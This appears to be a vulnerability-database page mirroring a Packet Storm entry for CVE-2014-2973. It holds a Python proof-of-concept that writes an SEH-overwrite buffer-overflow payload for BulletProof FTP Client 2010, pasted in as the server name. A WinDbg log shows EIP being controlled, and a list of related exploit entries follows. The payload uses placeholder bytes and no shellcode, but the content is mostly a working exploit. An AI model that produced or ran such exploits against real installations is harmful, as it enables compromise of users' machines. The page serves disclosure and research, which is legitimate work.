Lucene search
Gabor SeljanPACKETSTORM:127619HistoryJul 25, 2014 - 12:00 a.m.
BulletProof FTP Client 2010 Buffer Overflow
2014-07-2500:00:00
Gabor Seljan
packetstormsecurity.com
12
0.581 Medium
EPSS
Percentile
97.7%
`#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Jul 24 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 #
# CVE: CVE-2014-2973 #
#-----------------------------------------------------------------------------#
'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for bpftpclient.exe -
bpftpclient+0x1c005b:
005c005b f6431c10 test byte ptr [ebx+1Ch],10h ds:0023:4141415d=??
0:000> !exchain
0012f59c: bpftpclient+1c044e (005c044e)
0012f5a8: bpftpclient+1c046b (005c046b)
0012f618: 43434343
Invalid exception stack at 42424242
0:000> g
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
43434343 ?? ???
'''
#!/usr/bin/python
junk1 = b'\x41' * 89
nSEH = b'\x42' * 4
SEH = b'\x43' * 4
junk2 = b'\x44' * 1000
sploit = junk1 + nSEH + SEH + junk2
try:
print('[+] Creating exploit file...')
f = open('sploit.txt', 'wb')
f.write(sploit)
f.close()
print('[+] Exploit file created successfully!')
except:
print('[!] Error while creating exploit file!')
print('[+] Use the following as Server Name/IP with any user\'s credentials!')
print(sploit.decode())
`
Related
zdt
zdt
BulletProof FTP Client BPS Buffer Overflow Exploit
2015-01-06 00:00:00
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
2014-12-10 00:00:00
BulletProof FTP Client 2010 - Buffer Overflow (SEH)
2014-07-24 00:00:00
packetstorm
packetstorm
BulletProof FTP Client 2010 Buffer Overflow
2014-12-09 00:00:00
BulletProof FTP Client BPS Buffer Overflow
2015-01-06 00:00:00
BulletProof FTP Client 2010 Buffer Overflow
2014-09-06 00:00:00
exploitpack
exploitpack
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)
2014-12-03 00:00:00
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
2014-07-24 00:00:00
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)
2014-09-05 00:00:00
cvelist
cvelist
CVE-2014-2973
2014-12-15 17:27:00
cert
cert
BulletProof FTP Client 2010 is vulnerable to a stack-based buffer overflow
2014-07-24 00:00:00
seebug
seebug
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
2014-09-18 00:00:00
exploitdb
exploitdb
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
2014-07-24 00:00:00
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
2014-12-03 00:00:00
BulletProof FTP Client 2010 - Buffer Overflow (SEH)
2014-09-05 00:00:00
nvd
nvd
CVE-2014-2973
2014-12-15 18:59:02
prion
prion
Design/Logic Flaw
2014-12-15 18:59:00
cve
cve
CVE-2014-2973
2014-12-15 18:59:02